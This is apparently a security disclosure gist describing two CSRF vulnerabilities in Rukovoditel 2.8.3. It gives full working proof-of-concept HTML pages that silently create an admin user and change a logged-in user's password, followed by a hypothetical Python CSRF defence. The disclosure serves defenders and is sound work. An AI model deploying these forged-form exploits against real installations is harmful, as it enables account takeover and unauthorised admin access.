@victomteng1997
Last active April 5, 2021 06:01
Two CSRF vulnerabilities identified at Rukovoditel Project Management App

The official GitHub repository of the project is https://github.com/Rukovoditel/Rukovoditel, but it hasn't been updated for a long time. The source code of the software can be downloaded at: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_2.8.3.zip/download

Vulnerabilities description

  1. An attacker may exploit the CSRF vulnerability to add a user with admin privileges. Process: (1) The admin logs in to his own account with correct credentials. (2) The adversary crafts the following web page with a username "admin2" and password "admin2", and hosts it online.
```html
<html>
<head>
<title>CSRF add admin user</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 2;
    var i = 0;

    for (i = 0; i < count; i++)
    {
        document.forms[i].submit();
    }
}
</script>
<H2>Cross Site Request Forgery</H2>
<form method="POST" name="form1" action="http://localhost/rukovoditel/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="useremail" value="admin@admin.com"/>
</form>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin2"/>
<input type="hidden" name="password" value="admin2"/>
<input type="hidden" name="fields[7]" value="admin2"/>
<input type="hidden" name="fields[8]" value="lastname"/>
<input type="hidden" name="fields[10]" value="lastname"/>
<input type="hidden" name="fields[9]" value="admin2@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</body>
</html>
```

(3) Once the admin visits such a website, his session is used to create a new user with username "admin2" and password "admin2".

  2. An attacker may exploit the CSRF vulnerability to change the admin's password. Process: (1) The admin logs in to his own account with correct credentials. (2) The adversary crafts the following web page with a new password ("newpassword"), and hosts it online.
```html
<html>
<head>
<title>CSRF change password</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
    var count = 1;
    var i = 0;

    for (i = 0; i < count; i++)
    {
        document.forms[i].submit();
    }
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=users/change_password&action=change">
<input type="hidden" name="password_new" value="newpassword"/>
<input type="hidden" name="password_confirmation" value="newpassword"/>
</form>
</body>
</html>
```

(3) For anyone (including the admin) who is logged in to an account and visits this website, the account's password will be changed to the new password ("newpassword").
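As an added, hypothetical illustration (not Rukovoditel's own code), this is the server-side check that would reject both forged POSTs above: a per-session synchronizer token that the attacker's page cannot read, combined with an Origin/Referer comparison. It assumes the target module string, request headers and form body are available as plain dicts, and that the site is served at http://localhost as in the PoC URLs.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical defence, not Rukovoditel's own code: state-changing modules
# (the ones the PoC pages POST to) require a token and a same-origin source.
PROTECTED_MODULES = {"items/", "users/change_password"}
SITE_ORIGIN = "http://localhost"  # assumed deployment origin, as in the PoC URLs


def issue_csrf_token(session: dict) -> str:
    """Mint a random token, keep it in the server-side session and return it
    so the application can embed it as a hidden field in its own forms."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_forged(session: dict, module: str, headers: dict, form: dict) -> bool:
    """True when a POST to `module` must be rejected as cross-site."""
    if module not in PROTECTED_MODULES:
        return False
    # Check 1: a form auto-submitted from another site carries that site's
    # Origin (or Referer), never the application's own origin.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return True
    parts = urlparse(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return True
    # Check 2: the attacker cannot read the victim's token across origins,
    # so a forged body (like the PoC forms) never carries the right value.
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    if not expected:
        return True
    return not hmac.compare_digest(expected.encode(), submitted.encode())


def demo() -> tuple:
    """Replays the PoC's change-password body without a token (forged) and a
    legitimate same-origin submission carrying the session token (allowed)."""
    session = {}
    token = issue_csrf_token(session)
    poc_body = {"password_new": "newpassword", "password_confirmation": "newpassword"}
    forged = is_forged(session, "users/change_password",
                       {"Origin": "http://attacker.example"}, poc_body)  # constructed origin
    legit = is_forged(session, "users/change_password",
                      {"Origin": SITE_ORIGIN}, {**poc_body, "csrf_token": token})
    return forged, legit
```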
